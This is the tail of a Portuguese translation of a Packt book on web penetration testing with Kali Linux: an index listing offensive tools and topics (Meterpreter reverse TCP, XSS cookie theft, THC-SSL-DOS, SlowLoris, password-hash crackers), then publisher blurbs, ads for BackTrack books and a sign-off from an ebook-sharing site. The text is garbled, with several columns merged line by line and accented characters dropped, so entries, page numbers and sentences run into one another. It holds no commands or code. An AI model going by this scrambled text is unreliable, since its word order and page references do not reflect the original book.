formato 282 tentar arquivo 153 Skipfish Declarao de Trabalho. Ver SOW
Boto Report, DirBuster 113 Lei Sarbanes-Oxley (SOX) 280 cerca de 78, 80 STIG 254
relatrio, o formato Boto Salvar alteraes 63 opes de comando 78 Teste de Stress 31
apndices 294 Sistema SCADA 42 verso mais recente, o download de Resumo dos resultados 289
declarao de confidencialidade 283 Scalpel 276 78 Servios do Sistema 31
folha de rosto 283 guia scanner, Vega 86 SLE 15 dictstat 171, 172
documento, controle de 284 Scapy SlowLoris findmyhash 173
sumrio executivo 285, 286 cerca de 238 cerca de 241 Hash-identificador 170
resultados, resumo 289 ataque, cenrios 238-240 execuo 241 phrasendrescher 173
glossrio 294 Secure Socket Layer (SSL) 236 URL para download de 241 RainbowCrack (rcracki_mt) 172
metodologia 286, 287 auditoria de segurana 13 Cheirando e Spoofing 30 comando traceroute 52
rede, consideraes 292, 293 Guia de Segurana Tcnico de SniffJoke 246 TrustedSec. 130
rede, recomendaes 292, 293 Implementao. [319] Servios Turnkey 280
Ver STIG U
Unicast Inverter caminho Forwarding A Associao de Lnguas Modernas Windows Nossos livros e publicaes
(Unicast da montagem 154 compartilhar as experincias de seus
RPF) 263 Estilo Amrica. Ver MLA O Windows Reverse_TCP Meterpreter colegas profissionais de TI na
Atualize a opo Toolkit social- Time and Materials 281 136 adaptao
Engenheiro Prazo do trabalho realizado 11 Ataques sem fio 30 e personalizao de sistemas de hoje,
134 cronogramas 284 Wireshark aplicaes e frameworks. Nossa
urlsnarf ferramentas, Kali cerca de 187 soluo livros baseados
cerca de 208 CmosPwd 173 localizao 188 dar-lhe o conhecimento e poder de
acessando 208 creddump 174 trfego, capturando 188, 189 personalizar o software e tecnologias
utilizando 208 W bolinho inseguro, capturando 190 que voc est usando
relatrio de um utilizador 296 w3af Wireshark Biscoito Dump 182 para comear o trabalho feito. Packt
V cerca de 102-105 comando contagem de palavras 120 livros so mais especficos e menos
Vega Guia 104 Exploit X geral do que os livros de TI que voc
cerca de 85, 86 Entrar janela 104 XSS tem
Mdulos de injeo 86 Guia Resultados 104 cerca de 204 visto no passado. Nosso modelo de
Seo Proxy 88 w3mir 259 cookie de roubar 206, 207 negcios nico que nos permite
guia Proxy 86 [320] teste 205, 206 trazer-lhe informaes mais focado,
Mdulos de processamento de Z dando-lhe mais do que voc precisa
resposta 86 Wayback Machine ZAP saber, e menos do que voc no faz.
guia do scanner 86 acessando 36 cerca de 225, 226 Packt uma editora ainda originais
Site View janela 87 aplicao web 8, 9, 30 Arquivos SEED 228, 229 modernas, que se concentra na
Virtual Private Network (VPN) 261 Aplicaes Web Attack e Auditoria criao, com o Firefox 226, 227 produo de qualidade,
Imagem VM Quadro. Ver w3af Zaproxy. Ver OWASP-Zap livros de ponta para as comunidades
e Kali Linux 29 WebCopier 259 Zenmap 65 de desenvolvedores, administradores
de volume baseado ataques 236 Web Developer 180 abertura 60 e tambm de novatos. Para
vulnerabilidades 290, 292 Cookies de sesso web. Ver bolinhos [321] obter mais informaes, visite o nosso
Anlise de Vulnerabilidade 18, 30 Webshag website: www.packtpub.com.
Avaliao de Vulnerabilidade 13 16 cerca de 74-77 Teste de Invaso Web com Kali Linux Obrigado por comprar
relatrio vulnerabilidade 296 URL 77 Sobre Packt Publishing Sobre Packt Open Source
T webshag-gui 74 Packt, pronuncia-se 'embalado', Em 2010, Packt lanou duas novas
Tamper Data 108-110 Vetores de Ataque Site 134 publicou o seu primeiro livro marcas, Packt Open Source e Packt
Alvo de Avaliao 18 WebSlayer "Mastering phpMyAdmin para da empresa, a fim de
TCPReplay 248 cerca de 113-118 Aumentar a Eficcia continuar seu foco na especializao.
prova Guia Configurao de Ataque 114 Gesto MySQL " em abril de 2004 e, Este livro faz parte da marca Packt
procedimentos 288 Guia Generator Payload 114 posteriormente, continuou a Open Source, casa
THC 107 Websploit especializar-se em publicao de livros publicados sobre software
THC-SSL-DOS 236, 237 cerca de 95 livros altamente focada em construdo em torno de licenas de
Escolha do Hacker. Ver THC acessando 95 tecnologias e solues especficas. cdigo aberto, e que oferecem
Teste de caixa branca 9, 10 informaes
a qualquer um dos desenvolvedores Proteja a sua rede wireless contra Por favor, verifique Mais de 80 receitas / practicaltasks
avanados para iniciantes de web ataques, cortes, www.PacktPub.com para obter que vai
designers. A marca Open Source e intrusos com este guia passo-a- informaes sobre nossos ttulos aumentar o conhecimento do leitor a
tambm corre Open Source Royalty passo [324] partir de iniciante
Esquema de Packt, pelo qual Packt d 1. a um nvel avanado
um royalty para cada Abrir 2. BackTrack 5 Penetrao sem fio Foco especial sobre os mais recentes
Projeto Fonte sobre cujo software um 3. Guia do Testing Beginner sistemas operacionais,
livro vendido. Faa suas redes sem fio prova de ISBN: 978-1-84951-558-0 exploits, e tcnicas de teste de
Escrevendo para Packt balas Paperback: 220 pginas penetrao
Congratulamo-nos com todas as Facilmente proteger a sua rede de Mestre borda do sangramento A anlise detalhada de ferramentas de
perguntas de pessoas que esto intrusos tcnicas de teste com witeless terceiros com base
interessadas em criao. Propostas Veja como os hackers faz-lo e BackTrack 5 na estrutura Metasploit para melhorar
Livro aprender a 1. o
devem ser enviadas para defender-se 2. experincia em testes de penetrao
author@packtpub.com. Se a sua idia BackTrack 5 Cookbook 3. 2.
do livro ainda est numa fase inicial e ISBN: 978-1-84951-738-6 4. 3.
voc Paperback: 296 pginas Saiba Teste de Invaso sem fio com o Por favor, verifique
gostaria de discuti-lo primeiro antes de Mais de 80 receitas para executar verso mais recente do Backtrack www.PacktPub.com para obter
escrever uma proposta formal do livro, muitas das mais conhecidas O primeiro e nico livro que aborda informaes sobre nossos ttulos
entre em contato conosco; um dos e pequenos aspectos peneration de sem fio [325]
nossos testes conhecidos de testes com BackTrack
editores de comissionamento ir BackTrack 5 Conceitos explicados com o passo-a- Obrigado
entrar em contato com voc. 1. passo prtico Quer mais
Ns no estamos apenas procura de 2. sesses e ilustraes ricas Livros?
autores publicados, se voc tem fortes Aprenda a realizar testes de Escrito por Vivek Ramachandran - Ns esperamos que voc aprendeu
habilidades tcnicas, mas nenhuma penetrao com mundo o que voc esperava de aprender
escrita BackTrack 5 pesquisa de segurana de renome e com
experincia, os nossos editores Cerca de 100 receitas projetadas para evangelista, e este e-book. Encontrar tais livros
experientes podem ajud-lo a ensinar descobridor do wireless "Caffe Latte mais teis sobre
desenvolver uma carreira de escritor, princpios de teste de penetrao e de Attack" www.PlentyofeBooks.net
ou simplesmente obter alguma construo Metasploit Teste de Invaso
recompensa adicional para a sua conhecimento do BackTrack 5 Livro de receitas Saiba mais e fazer seus pais
especializao. Ferramentas ISBN: 978-1-84951-742-3 orgulhosos :)
Fornece instrues passo-a-passo Mais de 70 receitas para dominar o
BackTrack - Teste sem fio sobre mais utilizado Saudaes
Segurana de Rede o uso de muitos dos BackTrack do framework de testes de penetrao www.PlentyofeBooks.net
ISBN: 978-1-78216-406-7 popular e 1.
Paperback: 108 pginas ferramentas no to populares Paperback: 268 pginas
3.

Das könnte Ihnen auch gefallen